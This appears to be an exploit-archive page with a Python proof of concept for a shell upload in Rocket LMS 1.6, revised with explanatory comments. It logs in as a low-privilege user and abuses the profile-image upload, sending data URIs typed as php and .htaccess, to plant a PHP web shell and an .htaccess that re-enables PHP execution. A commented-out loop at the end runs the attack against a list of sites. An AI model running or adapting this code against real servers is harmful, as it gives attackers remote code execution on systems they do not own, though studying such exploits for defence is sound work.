
Web Rocket LMS 1.6 Shell Upload

DarckSol

# Exploit Title: Rocket LMS - Learning Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: 1.6
# Tested on Ubuntu 18.04
import time
import requests
import base64
import re

import traceback
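class Rocket:
    """Drive the Rocket LMS profile-image upload to drop a PHP file and an .htaccess.

    Flow (see ``login``): authenticate with an ordinary account, then POST to
    ``/panel/setting`` with ``profile_image`` set to a ``data:`` URI whose
    declared subtype is ``php`` (the payload) and then ``.htaccess``. The
    server apparently reuses that subtype as the stored file's extension
    without checking it against an image allow-list -- this is inferred from
    the payload shape; confirm against the target's upload handler.

    All requests go through one ``requests.Session`` so the Laravel session
    and ``XSRF-TOKEN`` cookies persist between the token fetch and each POST.
    """

    # Base64 of the .htaccess dropped next to the shell. It decodes to
    # "RewriteEngine On", "Options +Indexes", "RewriteBase /", "Allow from all"
    # and a <FilesMatch "\.(?i:php)$"> block that grants access under both
    # mod_authz_core and the legacy Order/Allow directives -- presumably to
    # re-enable .php in an upload directory whose own .htaccess denies it
    # (not verified here).
    _HTACCESS_B64 = "UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="

    def __init__(self, ssl, host, port, email, password, file):
        """Store connection and account details; nothing is sent until ``login``.

        Args:
            ssl: truthy for ``https://``, falsy for ``http://``.
            host: target hostname or IP, without scheme or port.
            port: TCP port; the original caller passes it as a str ("443"),
                an int also works since the URL is built with an f-string.
            email: login name of an existing account (the default caller
                uses the vendor demo student account).
            password: that account's password.
            file: local path of the PHP payload uploaded by ``upload_shell``.
        """
        self._url_to_upload = "/panel/setting"
        self._url_to_login = "/login"
        self.host = host
        self.port = port
        self.ssl = ssl
        self.email = email
        self.password = password
        self.file = file

    def get_csrf_token(self, client, URL):
        """GET ``URL`` and return the Laravel ``_token`` hidden-field value.

        Returns None (after printing an error) when the response did not set
        an ``XSRF-TOKEN`` cookie or the page carries no ``_token`` input. The
        original indexed ``findall(...)[0]`` and raised IndexError on a
        token-less page; callers now receive None and must bail out.
        """
        page = client.get(URL)
        if "XSRF-TOKEN" not in client.cookies:
            print("Error while fetching token")
            return None
        # [^"]* rather than .*: a greedy .* runs to the last quote on the
        # line when further attributes or inputs follow the value.
        match = re.search(r'<input type="hidden" name="_token" value="([^"]*)"', page.text)
        if match is None:
            print("Error while fetching token")
            return None
        return match.group(1)

    @staticmethod
    def _data_uri(subtype, raw):
        """Return ``data:image/<subtype>;base64,<payload>`` for a bytes payload.

        ``subtype`` is what the server seems to turn into the stored file's
        extension (``php``, ``.htaccess``). Decoding the base64 output as
        ASCII replaces the original ``str(bytes)[2:-1]`` slice that chopped
        the ``b'...'`` repr off by hand.
        """
        return "data:image/" + subtype + ";base64," + base64.b64encode(raw).decode("ascii")

    def _post_profile_image(self, client, URL, csrftoken, data_uri):
        """POST the settings form with ``profile_image`` set to ``data_uri``.

        Returns True when the server answered 200. That only shows the
        settings endpoint accepted the request -- the application may return
        200 with a validation error in the body -- so callers should confirm
        the file actually exists via the site's file manager.
        """
        data = dict(_token=csrftoken, step=2, next_step=0, profile_image=data_uri, cover_img="")
        r = client.post(URL, data=data)
        print(r.status_code)
        return r.status_code == 200

    def login(self):
        """Authenticate, then upload the shell and the .htaccess on one session.

        Aborts with a message if no CSRF token could be read from the login
        page. Login success itself is not verified against a response marker;
        Laravel typically answers a failed login with a redirect back to the
        login form, so landing on ``/login`` again is reported as a warning,
        but the uploads are still attempted as in the original.
        """
        client = requests.session()
        scheme = "https://" if self.ssl else "http://"
        base = f"{scheme}{self.host}:{self.port}"
        login_url = base + self._url_to_login
        upload_url = base + self._url_to_upload

        csrftoken = self.get_csrf_token(client, login_url)
        if csrftoken is None:
            print("couldn't read a CSRF token from " + login_url + "; aborting")
            return
        # get_csrf_token already fetched the login page, so the session
        # cookies are set; the original issued a second, redundant GET here.
        login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')
        r = client.post(login_url, data=login_data)
        if r.url.rstrip("/").endswith(self._url_to_login):
            print("warning: landed back on the login page; credentials may be wrong")

        self.upload_shell(client, upload_url)
        self.upload_htaccess(client, upload_url)

    def upload_shell(self, client, URL):
        """Upload ``self.file`` as a ``data:image/php`` profile image.

        The payload is read as bytes, so a file with non-UTF-8 bytes no longer
        raises UnicodeDecodeError (the original opened it in text mode and
        re-encoded to UTF-8).
        """
        csrftoken = self.get_csrf_token(client, URL)
        if csrftoken is None:
            print("couldn't upload shell")
            return
        with open(self.file, "rb") as payload:
            raw = payload.read()
        if self._post_profile_image(client, URL, csrftoken, self._data_uri("php", raw)):
            # NOTE: URL is the settings endpoint, not the stored file's location.
            print("sent and uploaded shell :" + URL + "\n")
        else:
            print("couldn't upload shell")

    def upload_htaccess(self, client, URL):
        """Upload the pre-encoded .htaccess (``_HTACCESS_B64``) as a profile image.

        The blob is already base64, so it is concatenated straight into the
        data URI. On success the operator still has to rename the stored file
        in the site's file manager, as the original message says.
        """
        csrftoken = self.get_csrf_token(client, URL)
        if csrftoken is None:
            print("couldn't upload htaccess")
            return
        data_uri = "data:image/.htaccess;base64," + self._HTACCESS_B64
        if self._post_profile_image(client, URL, csrftoken, data_uri):
            print("sent and uploaded htaccess:" + URL + "\n")
            print("Go and rename file in filemanager on website")
        else:
            print("couldn't upload htaccess")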

 

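if __name__ == "__main__":
    # Single-target run. The account is the vendor demo student login, so an
    # ordinary low-privilege user appears to be enough (confirm on the target);
    # point host/port at a system you are authorised to test and `file` at
    # the PHP payload to drop. The __main__ guard keeps importing this module
    # (e.g. to reuse Rocket from the commented dork loop below) from firing a
    # login against localhost as a side effect.
    elon = Rocket(True, "localhost", "443", "student@demo.com", "student", "/home/mm1nd/Desktop/shell.txt")
    elon.login()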



#with dork
# try:
# with open("sites.txt","r") as urls:
# url = urls.readlines()
# ssl = True
# port = 443
# for line in url:

# try:
# if "sslyok" in line:
# port = 80
# ssl = False
# line = str(line.rstrip('%0a'))

# print("trying:"+line)
# elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")
# elon.login()
# time.sleep(1)
# except Exception:
# #traceback.print_exc()
# print("atamadim")

# finally:
# print("okey")
# except Exception:
# print("atamadim")
 

